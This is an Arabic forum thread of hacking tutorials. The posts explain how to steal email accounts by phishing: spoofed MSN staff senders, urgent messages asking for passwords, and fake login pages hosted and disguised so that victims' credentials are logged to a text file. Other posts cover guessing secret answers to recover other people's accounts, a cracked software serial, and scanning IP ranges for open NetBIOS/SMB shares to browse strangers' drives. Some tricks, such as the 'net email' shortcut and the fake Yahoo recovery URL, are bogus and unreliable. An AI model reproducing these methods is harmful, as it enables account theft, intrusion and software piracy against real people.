5. لا يمكن حذف أي رسالة أو تكوين رسالة من البريد الذي تستطلعه .
أتمني أن يكون قد قدمت خدمة كبيرة للوطن العربي العزيز.
و شكرا .

مثال2:/

أولا اذهب إلى هذه الصفحة:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وهي عبارة عن Anonymous E-Mailer Page مجانية أي ممكن ترسل رسائل بعناويين مزيفة
(كما تفعل الكثير من البرامج ولكن الصفحة أسهل وأسرع واضمن)
وهي تخفي الآيبي الحقيقي عن متلقي الرسالة

ثانيا تضع المعلومات المطلوبة وهي
To: تضع بريد من تريد اقتناصة
From : تضع البريد التالي بالضبط [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] مع "S" كبيرة ..
وهنا المفاجأة حيث ستظهر أمام الرسالة عند المتلقي علامة الفراشة التابعة لـ MSN لإعطاء انطباع الرسمية
(ملاحظة يجب أن تكون Capital S وليس Small S عند كتابة Staff ..
Subject:عاد هنا أنت ومهارتك لازم تشد انتباه القارىء صاحب البريد بكلمات مثل
Urgent أو You are Losing Your Account أو ماشابه

وفي الرسالة تكتب له أن عليه إرسال الباسوورد إلى عنوان معين
حتى لا يفقده وأن تحدد له هذا العنوان (طبعا غير اللى فوق)وتكون فاتحه مسبقاً ..
واذا أردت التبرير ممكن تقول أن حسابه بالبريد يقع على أحد الخادمات التي تعطلت
ويجب عليه التعاون بسرعة لكي يتجنب فقد حسابه حيث أن معلومات المستخمين الآن على سيرفر احتياطي ..؟؟

وهناك من المغفلين الكثر
ومن ثم انتظر الرد خ خ خ خ

ثامنا:اختراق البريد عن طريق اكواد HTML:

دائما نسمع عن الاختراق باكواد HTML ولكننا لم ندرك ما هي هي عبارة عن كود تقوم بارساله فى رساله لصديقك
و الكود هذا بيعتمد على مدى ذكائك..

المتطلبات: ايميل في الياهو فقط

الطريقة:[/B
]-كون رساله جديده طبعا في ايميلك على الياهو
-اعمل علامه صح على تشغيل خاصيه HTML (راح تجدها اخر الرسالة).
-في خانة TO اكتب ايميل الضحية.
-في خانة subject اكتب عنوان الموضوع.
-ضع الكود بالرساله (لتحميل الكود ضمن المرفقات)
مع تغير الكلام المكتوب بالعربى..كالاتي
في السطر التاسع عشر 19 بالكود >>اكتب ايميلك على الياهوو كامل
في السطراثنين وعشرون 22 بالكود >>اكتب اسم ايميلك على الياهوو من غير @YAHOO.COM
في السطر66 >>اكتب اسم الايميل اللى انت عايز تسرقه

[b]ملحوظه :
تشغيل خاصيه html قبل وضع الكود بالرساله
-------
كيف ممكن تقنع صديقك بانه يحط الباسورد؟؟
ممكن تعمل ايميل باسم
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
او اسشتخدم اي برنامج لارسال اي رسالة من ايميل مجهول وليكن KABOOM
و تكتب مثلا في الـ subject:
Do u Yahoo!!do u want to increase your hotmail account using yahoo
تاسعا :اختراق البريد عن طريق معرفة المعلومات للضحيه :

طبعا هذه الطريقه من اختراق الايميل لاتعتبر اختراق بحد ذاته وانما ذكاء من الخترق للايميل

وهي معرفة بعض المعلومات عن الايميل المراد اختراقه وارسال رساله الى [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
واذا اقتنعوا انه صحيح ..سوف يرسلون لك رساله بكلمة المرور اليس هذه النقطه سهله
لكن يجب انت تعرف المعلومات

عاشرا:اختراق البريد عن طريق معرفة الجواب السري للضحية:

طبعا الطريقة شبه مستحيلة...لكن ممكن انك تفكر شوي وتحاول
وهي إنك تدخل موقع الـ htomail
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وتروح عند
?Forgot Your Password
E-mail Address أكتب الإيميل المراد اختراقه أو استرجاعه
Country/Region ضع المنطقة
وبعد ذلك قم بالضغط على Continue
بعدها راح تفتحلك صفحة اضغط مرة أخرى على Continue بدون تغيير أي شيء
وبعدين راح تخش على الإيميل إذا كان اختيارك للمدينة صحيح فسوف تظهر هذه الخيارات
وإذا كان لأ راح يوديك للـStep رقم 1
أوكي نكمل ألحين مثلا نفرض ان المدينة اللي حطيتها صح راح تطلعلك هذي الخيارات
Secret Question راح يكون جاهز امامك
Secret Answer عاد هنا لازم تستخدم ذكائك وعقلك وعلى مدى معرفتك بالمعلومات بخصوص الضحية
طبعا هنا راح تكتب الباسوورد الجديد للإيميل واللي راح تكون جاهزة
لكن ماراح تنفع إلا إذا كان جوابك صح New Password
إعادة الباسوور الجديدة اللي كتبتها مسبقا Retype New Password
وبعدها اضغط Continue وراح تخترق الإيميل إذا كان الجواب صحيح ........

احدى عشر : استرجاع الايميل المسروق :

طريقتين هم لا اكثر ..

1- من هنا ..
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

2-تقوم بإرسال رسالة إلى شركة الهوتميل وهو
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وتكتب عنوان الرسالة:
PW VERIFICATION INFO ENCLOSED
وتملأ هذا النموذج :
first mane : أسمك الأول
- last mane : أسمك الأخير
- Sign-in name : ايميلك المسروق
- Country/region : الدولة
- State : المدينه
- Zip or postal code : رقم الكود(رقم كود السعودية966)
- Approximate date of last successful sign-in or approximate date of account registration : تاريخ آخر يوم فتحت إيميلك
- The name of your ISP :
- As many "old" outdated passwords you used in the past as you can remember وهنا تكتب كلمات السر القديمة التى تتذكرها
وبعد الإنتهاء ....تقوم بإرسالها

وستصلك هذه الرساله مباشره بعد ارسال المعلومات هذا نصها :
This is an auto-generated response designed to let you know our system received
your support inquiry.
الخ..

اذا كانت المعلومات ناقصه اوغير صحيحة ستاتيك هذه الرساله :
Hello abcd_110,
Thank you for writing to MSN Hotmail. This is Janice, and I am writing in
response to your password concerns.
Kindly provide the following information for verification purposes.
- Name (first and last)
- Sign-in name
الخ..

اذا كانت البيانات التى ارسلتها مقنعه سيرسلون لك هذه الرساله بعد ساعة أو بالكثير 3 ساعات وبها كلمة السر :
الخ.... وراح تجد الباسوورد
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالأربعاء 14 يوليو 2010 - 10:50


[ندعوك
للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]




بسم الله الرحمن الرحيم
اللهم صل على محمد وعلى آله وصحبه أجمعين
السلام عليكم ورحمة الله وبركاته
اهلا وسهلا اعزائى الاعضاء اليوم اقدم لكم موضوع رووووووووووووعه يمكنك
اخذ الباسورد بتاع اى ايميل بدون اى برنامج....فابسم الله نبدأ....ان تسرق
باسوورد اي ايميل بدون برنامج
-1- اضغط كليك يمين علي الديسك توب واختار نيو ثم اختار

shourtcut
سيظهر
مستطيل اكتب فيه:
%windir%\System32\net.exe system.exe

( الأفضل ان تعمل كوبي و باست )
ثم سيظهر لك مستطيل مكتوب فيه : net

اتركه ثم اضغط
finish
ملاحظة لا تفتح الشورت كات ابدا
ملاحظة : يجب انا يكون الأيميل الذي تريد سرقة باسوورد متصل بالنت و موجود
اون لاين علي الماسنجر
-2- اذهب إلي الدوس و اكتب net

ثم اضغط enter
ثم اكتب net email to email
( استبدل كلمة ايميل الأولي بالإيمل الذي تريد سرقة باسوورده و كلمةالإيميل التانية بإيميلك انت )
اقفل الدوس
-3- اضغط كليك يمين علي الشورت كت إلي انت عملته علي الديسك توب واختار
properties

ستفتح نافذة كبيرة
اختار من فوق options

ثم اختار edit opitions
هتلاقيها مختارة علي insert
mode غيرها و اجعلها
quick edit mode

ثم اضغط apply
-4- الآن افتح الشورت كات و انتظر و سوف يرسل لك باسوورد الإيميل إلي
ايميلك
هذه الطريقة علي ويندوز إكس بي فقط............للامانه الموضوع منقول لكنه
اعجبنى وياريت لو يتثبت علشان الموضوع ده بالنسبه لى حلو اوى وسوف يفيد
باقى الاعضاء حتى
المبتدئين.........تحياتى للجميع ومش تبخل عليا بردك......لا اله الا الله ....محمد رسول الله
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالأربعاء 14 يوليو 2010 - 10:52

تحميل برنامج سوفت كام,برنامج سوفت كام




السلام عليكم جميعا

هذا البرنامج

نادر جدا

لان تم تشفيرة من كل الشبكات حتى من موقعة

الخاص

لكن بأذن الله تم تصميم نسخة مطابقه عنه
تحميل برنامج سوفت كام
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

وانا رفعتة لكم من هذا الموقع

لان المواقع العربية ماقدرت احملة عليهم

انجي لشرح

طريقة تصوير الكام بسيطة جداً


عند مشاهدة أي عرض كام وتريد تصويره
اذهب وشغل البرنامج واعمل كما بالصورة

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

رقم (1) اضغط على OPTIONS وتظهر لنا قائمة الخيارات
افتح المستطيل الاول وختار SoftCam Screen Capture
ثم اضغط OK موافق

رقم (2) اختر Live ويظهر لنا الاطار الذهبي كما في الصورة اعلاه
رقم (3) الاطار: ومنه تستطيع التحكم بقياس اطار عرض الكام
وذلك من خلال الضغط بالماوس على زوايا الاطار

رقم (4) اضغط MOVIE لكي نصور الكام بالفيديو موفي
وايضاً هذا الخيار يمكنك من تصوير عرض الفيديو كليب (الافلام)
رقم (5) اضغط START لنبدأ التصوير

حرك الاطار في المكان المطلوب تصويره وتحكم بقياسه من
الزوايا ويمكنك مشاهدة التصوير في لوحة العرض PREVIEW

بعد الانتهاء من التصوير اضغط STOP في مكان كلمة START
ويتم تلقائياً حفظ التصوير في سطح المكتب بنسق AVI

ثانياً عرض الكام


****************



عرض الكام هو ان يكون لديك فيلم وتريد تشغيله عن طريق هذا البرنامج لكي يشاهده
اصدقائك عبر كاميرا الماسنجر الياهو والهوتميل والبالتوك او اي ويب كام اخرى


سوف نتعرف اولاً على الخطوات المطلوبة لتشغيل وعرض الكام

ملاحظـة
يجب ان يكون فيلم الفيديو بصيغة avi وذلك حتى تستطيع عرضه على الكام

# نشاهد الآن الصورة التالية وهي تبين لنا شرح عرض الكام

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

رقم (1) نحرك الماوس ونختار كلمة STORED
رقم (2) نختار PLAY تشغيل
رقم (3) نضغط على OPTIONS الخيارات، ومنها تظهر قائمة الخيارات المنسدلة
رقم (4) نختار MOVIE وهذا الاختيار تستطيع اختياره في البداية
رقم (5) نضغط كما بالصورة لنفتح المستطيل وتخرج منه قائمة منسدلة
رقم (6) نختار من القائمة المنسدلة كلمة Creative WebCam Vista (VFW) لعرض الكام
رقم (7) طبعاً هذا الخيار SoftCam Screen Capture يكون لتصوير الكام وليس للعرض
رقم (8) اخيراً اضغط OK

طبعاً كل هذه الخطوات هي لتهيئة عرض الكام ليكون جاهز لعرض الافلام

نكمل الشرح العرض

بعد ان انتهينا من تهيئة جميع خطوات عرض الكام
نتوجه الى الملف الذي به الفيلم المراد عرضه على الكام
ونفتح الملف الذي به الفيلم وكما قلت بالسابق يجب ان يكون الفيلم بصيغة AVI
حتى تستطيع عرضه على الكام
وايضاً اذا كان لديك فيلم بصيغة مختلفة تستطيع تحويله الى صيغة AVI

الان ننتقل الى الصورة الاخيرة للشرح

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

توجه الى الفيلم المطلوب واعمل عليه يمين الماوس ثم اختر ارسال الى Softcam


ملاحظـة
اذا أردت الطريقة الصحيحة لعرض الفيلم على الكام
اولاً تشغل برنامج SoftCam وتعمل الخطوات السابقة للعرض كما بالصورة الثانية
ومثلاً تكون على الماسنجر وبعدها تعمل دعوة WebCam لصديقك وذلك لتعرض له الفيلم الذي لديك
ثم تذهب الى الملف الذي به الفيلم ثم تعمل عليه يمين الماووس
وارسال الى سوفت كام كما بالصورة الاخيرة

بمعنى ان تشغل البرنامج ثم تعمل دعوة وبعدها تعمل ارسال للفيلم الى السوفت كام ويتم عرضه

الطريقة سهلة وبسيطة


------------------------------------


ايضا تستطيع تغيير صورة العرض التي تظهر في البرنامج
وذلك من خلال مجلد البرنامج بهذا المسار
C:\Program Files\Luminositi\SoftCam1.5\Media\Visual\Still
هنا بهذا المسار تجد صورة باسم softcam وهي الصورة الرئيسية
التي تظهر اثناء تشغيل البرنامج وتكون في لوحة العرض PREVIEW
تستطيع تغيير هذه الصورة واضافة صورة جديدة من عندك
بشرط ان تكون الصورة الجديدة بنسق BMP وثم تعيد
تسميتها الى softcam وبهذا يتم تغيير الصورة في لوحة العرض


بيانات التسجيل
Name: Registered
Mail: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
RegKey: LMSCCD157FFFFD0F2B06


ملاحظــة
شغل البرنامج وسجله بالسيريل وبعدها اغلق البرنامج
والصق الكراك بمجلد البرنامج بهذا المسار ووافق على الاستبدال
C:\Program Files\Luminositi\SoftCam1.5

ايضا افتح ملف الكراك وتجد بداخله ملف اسمه Driver
افتحه وانسخ ملف الديل SCVid32.dll الذي بداخله والصقه
بنفس ملف Driver الموجود في مجلد البرنامج بهذا المسار
C:\Program Files\Luminositi\SoftCam1.5\Driver
ثم وافق على الاستبدال


موقع البرنامج
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالأربعاء 14 يوليو 2010 - 11:26

الرابط الجديد للياهو لتحصل على الرقم السري لاي حساب بحجة انك نسيته هو

مجرد ارسال رسالة لايميل خاص بشركة ياهو وهو برايفت ويستخدم عند نسيان
باسوورد احد الايميلات و بالتالي يمكن سرقة الايميلات منه كل ما عليك انك
تبعت رسالة عادية

تكتب في خانة to

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

و في عنوان الموضوع
Password auto getting back
وتكتب في المكان الفاضي الكبير نص الرسالة التالي :
http:\\yahoo=%20%&User=(ايميل الضحية)getting%20%back%20 %Pass=\\to(ايميلك)with%20%pass(الباسويرد)=autoyaho o&send\lem
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالأربعاء 14 يوليو 2010 - 11:29

انا
شفت الكتير من الاعضاء يجدون صعوبة في صنع صفحات مزورة تخصهم اعرف ان
الموضوع قديم شوية لكن هذا للافادة الي يحتاج الطريقة طيب لو تابعت الشرح
لن تجد صعوبة في صنع صفحتك نبدأ على بركة الله
---
اولا ادخل هنااا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
---
طبق كما تشاهد في الصور
ملاحظة: انا كما راح تشاهدو في الصور انا اكتفيت باستخدام بعض الخيارات
المتاحة في الفوريم لكن من حقكم استخدام اكبر عدد من الخيارات هذا على حسب
صفحتك يلاه تابعو الشرح
---
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
---
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
---
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
---
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
---
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
---
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
---
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
-------
طيب لما تضغط SOURCE راح تطلع لك صفحة فيها كود صفحتك المزورة طيب انسخه وألصقه في المفكرة بامتداد .html
متلا نقوم بتسمية الصفحة هكذا ===> ThE GhOsT.html تم قم بحفظ صفحتك .save
--------
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
--------
خلاص في النهاية انتو ودكائكم في جمالية الصفحة لازم تعدلو عليها ببرنامج الرونت بيج او الدريم وفر او الوي مكر او........الخ.
---
بعدين نروح لموقع استضافة ادخل هنااا وراح تلقى اكبر عدد من مواقع الاسضافة
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
---
طيب بعدين لما تتسجل في احد مواقع الاستضافة لما يرسلو لك المعلومات بتاعك التي تتضمن
الباس
واليوزر
وموقعك
---
طيب الان راح تحتاج برنامج الرفع كــ ftp leap او file zilla طيب حمل file zilla من هنااا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
---
وطريقة رفع الصفحة شوف الصورة
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
-----
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
----
حتى الان كلشي واضح طيب الان لما ترفع الصفحة لازمك اسم مغري لصفحتك طيب
روح على هذا الموقع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وبدون ما اطو عليكم
الشرح بالصور من هنااا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
----
طبعااا التبليغ صاروخ ومضمون مية 100%100 بدون نقاش .
---
اتمنى الان يكون كل واحد قادر على انشاء صفحتو المزورة
السلام عليكم ورحمة الله
لاتنسوني ببالردود و الدعاء لي ولوالدي . ودمتم سالمين.
والموضوع ....لسا ما خلص ..انتضروني [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


-------------------------------------


تتمة الموضوع:
يعني لو انت مش عايز تصنع صفحتك بنفسك
اقدم لك هذه الصفحات المزورة وعلى فكرة التبليغ على ملف txt صاروخ
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
----
بعد تحميل الصفحات المزورة راح تلقى كل مجلد فيه تلات ملفات ارفعهم بتلاتة ضروري تابع الشرح
----
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
---
كما دكرت سابقا غير رابط الصفحة برابط تاني مغري والطريقة مشروحة فوق نشوف التبليغ
---
تابع معايا
---
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
---
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
---
طيب كل شي سهل والان طبقو الي في الصور وان شاء الله كل شي سيتم على اكمل وجه والموضوع لسااا ما خلص [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
طيب شوف الصفحة
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

----
والتبليغ كما قلت سابقا في ملف passes.txt
----
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
----
الان خلصت من الشرح والموضوع لسا ما خلص طلبي منكم هو الدعاء لاخوانكم في غزة
السلام عليكم ورحمة الله
---
ملاحظة: المرجو من مشرف القسم التتبيت [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة] لان الموضوع راح يكون مستمر



-------------------------------------


كما قلت لكم الموضوع مستمر
--------
طيب الان لو لم تحب شقاء الراس واستخدام مهاراتك الفردية لصنع صفحتك
الخاصة الان افتتح موقع صنع الصفحات المزورة وكما وعدنا بتميزه وجديده لكن
اختلف عن الاول في التبليغ والاستخدام طيب الان اشرح لكم طريقة التسجيل
ولطريقة للافادة فقط [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
-------
اولا ادخل على موقع [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
------
بعين تابع الصور
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
-----
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
-----
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
-----
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
-----
طيب كل تمام بعد التسجيل دخلنا حسابنا واخترنا صفحتنا لكن ممكن واحد يقولي
لما خرجت وابي ادخل مرة تانية لقائمة الضحايا كيف ؟؟؟ طيب شوف الشرح وراح
تعرف كيف
-----
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
-----
كما موضح في الصورة احسن تدخل من الاسفل يعني من هذا الرابط ((((ا[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]))) كما مبين في الصورة
-----
تابع الشرح
----
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
---
واخيرا التبليغ 100%100 ومضمون وصاروخ
---
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
---
الان لا يقولي احد ما سرقت ايميل يلاه بالتوفيق و طريقة شكري هو الدعاء للمجاهدين في كل مكان
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالأربعاء 14 يوليو 2010 - 11:44

أتحكم فى جهازك وجهاز اصحابك من أى مكان فى العالم مع برنامج TeamViewer+شرح بالفيديو

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]

تعريف البرنامج

برنامج
يمكنك من التحكم فى جهازك عن بعد وذالك عن طريق تنصيب البرنامج على جهازك
وعلى الجهاز الاخر الذى تريد ان تتحكم فى جهازك من خلاله وبالتالى يمكنك
هذا البرنامج من نقل البيانات والملفات والصور والبرامج وأى شىء على
الجهاز الاخر بسهوله .

ويمكنك هذا
البرنامج من ربط جهازك بجهاز اقاربك او اصدقائك او اى شخص اخر تريد ان
تعطيه ملف او صورة او برنامج او اى شىء اخر وذالك فى اى مكان بالعالم
وهناك حاليا اكثر من 10 مليون مستخدم يستخدم هذا البرنامج والبرنامج
متوافق مع جميع انواع الويندوز .


حجم البرنامج 2 ميجا ونصف

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]

لمشاهدة شرح البرنامج فيديو باللغة العربية




من هنا


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالأربعاء 14 يوليو 2010 - 13:11

اخترق اى اميل من غيير برامج ولا بتاع










[ندعوك
للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]





السلام عليكم و رحمة الله و بركاتة

تسمى هذه الطريقة طريقه المشاركة في الملفات والطابعة .

الشروط :

يجب أن يكون على نظامك عميل يسمى . Microsoft Networks

وطريقة إضافته كالتالي :


اضغط على زر ابدأ START

ومن ثم إعدادات . Settings

ومن ثم لوحة التحكم . Control Panel

ومن ثم بالنقر على أيقونة شبكات . Networks

سوف تظهر معك شاشة الاضافه ، اضغط على كلمة عميل . Client

ستظهر معك شاشة اختيار نوع العميل الذي تريد اضافته ، اضغط على شركة
Microsoft ومن ثم اختر العميل Client for Microsoft Networks ومن ثم اضغظ
موافق ، بعدها سيطلب منك ادخال قرص الويندوز لتحميل بعض الملفات وبعدها
يطلب منك اعادة التشغيل ، اختر لا لكي لا يعيد النظام التشغيل .

سترجع الى شاشة اعداد الشبكات مرة اخرى ، اضغط على زر مشاركة بالملفات الطابعة .

ضع صح على كل من :

اريد أن اكون قادرا على إعطاء الاخرين حق الوصول الى ملفاتي. I want to be able to give others access my files


اريد أن اكون قادرا على السماح للآخرين بالطباعة على طابعتي .

I want to be able to allow to others to print on my printers



· اضغط علىموافق ، وبهدها أغلق اعدادات الشبكة .

· سترجع الى شاشة لوحة التحكم ، اضغط على ايقونة كلمات المرور ( احمر Passwords )

· ستظهر معك شاشة كلمات السر ، قم بالتقر على ايقونه Remote Administration .

· ضع علامه صح على Enable remote administration of this server وبعدها
ادخل أي كلمة سرية مرتين ومن ثم موافق . الغرض من هذه الخطوة كي لا يتمكن
أحد من الوصول الى ملفاتك وطابعتك الا بالكلمة السرية التي أنت وضعتها





الان حققت الشرط الازم للاختراق وبقي عليك الطريقة لكي تصل الى ملفات غيرك على الانترنت .



الطريقة :



§ في البداية يجب عليك ان تستخدم برنامج اسمه Legion وهو برنامج مثل برامج
الاسكان بورت ويستخدم للبحث في شبكة الانترنت على الأجهزة المفتوحة وعليها
خاصية مشاركة الملفات والطابعة .

تستطيع ان تحمله من هذا الموقع وحجمه 3 ميقابايت :
]
صلة البرنامج
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
بعد تشغيلك للبرنامج سوف يظهر لك قائمتين . القائمة اليسرى يظهر لك أرقام
الايبي المصطاده والقائمة اليمنى يعرض لك فيها بيانات كل ايبي وماهي
السواقات والطابعات المشاركة وفي الاعلى هناك 4 مربعات فارغة لك تطلب منك
ادخال المدى الذي تريد البحث فيه ، على سبيل المثال نريد البحث في المدى
212.64.130.1 . بعد ان تملى المربعات اضغط على زر scan لكي تبدأ البحث .

سوف يبدأ البرنامج في البحث وسوف يظهر لك ارقام الايبي التي حصل عليها في
القائمة اليسرى ، وبعد ان ينتهي من البحث سوف يقوم بفحص كل ايبي حصل عليه
لكي يظهر لك ما بداخل كل ايبي من سواقات وطابعات ومشاركة ، وسوف يضعها لك
في القائمة اليمنى .

فلنفرض أنه اصطاد سواقات على احدى ارقام الايبي عندها سيعرض لك البيانات كالمثال التالي :


Shared resources at [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

Sharename Type Comment

ــــــــــــــــــــــــــــــــــــــــــــــــــ


ــــــــــــــــــــــــــــــــ

ATL OPS STUF Disk

C Disk

DC ROM Disk

DC STUFF DISK

FMPRO Disk

JW STUFF Disk

The command was completed successfully .



اذا ظهرت لك بيانات على أي رقم كالبيانات السابقة انسخ رقم الايبي .

بعدها اضغط على زر ابدأ . (START)

اختر تشغيل . (RUN)

ثم اكتب رقم الايبي

ــــــــــــــــــــــــــــــــــــــــــــــــــ


ـــــــــــــــــــــــــــــ

عندها سوف يفتح لك نافذه كنافذه المستكشف (Explorer) ويضع فيها سواقات الجهاز الذي أنت بداخلة الآن ، اختر أي سواقة تريد .



كيف تحمي نفسك من الاختراق :

اذا كنت مبتدء وتريد حمايه جهازك وملفاتك على الانترنت من هذه الطريقه
فامسح العميل Microsoft Network من اعدادات الشبكة ، وسوف يكون جهازك
بامان تام ان شاء الله






نظام unix وشكرا للامير العاشق على الوصله
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالأربعاء 14 يوليو 2010 - 13:15

الإختراق عن طريق Netbios _ أصل الإختراق بدون باتش _

الكاتب : DARKWALKER
بسم الله الرحمن الرحيم
موضوع اليوم : الإختراق عن طريق NetBios Attack

هذه الثغرة تظهر بصورة خاصة إذا ما كان لديك Home Network أو أى نوع اخر
من أنواع الشبكات مثل LAN أو WAN أو MAN وغيرها ، أيضا يمكن إختراق حاسبك
الشخصى إذا كانت لديك تلك الثغرة.
وللتجربة على نفسك كمثال : إحصل على IP الخاص بجهازك بواسطة ذلك البرنامج الصغير المحمل في المرفقات مثلا .
1- بعد حصولك على IP سيظهر بالشكل التالى 207.107.1.1 ( هذا الرقم إفتراضى).

2- الان إذهب الى START ثم RUN ثم إكتب CMD لتفتح لك شاشة الدوس .

3- إكتب داخل شاشة الدوس Nbtstat –A IP ADRESS : لا تنسى أن تكتب IP الخاص بك مكان IP ADRESS ، ثم إضغط ENTER .

4- سيظهر لك الجدول التالى :
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
-------------------------------------------
J-1 <00> UNIQUE Registered
WORK <00> GROUP Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
ملحوظة : تم حذف المعلومات الأصلية من الجدول .

5- الرقم الظاهر ما بين <> يطلق عليه HEX CODE VALUE ، وما يهمنا
هنا أن نجد رقم 20 ما بين الأقواس وهذا يعنى أننا لدينا PRINTER OR FILES
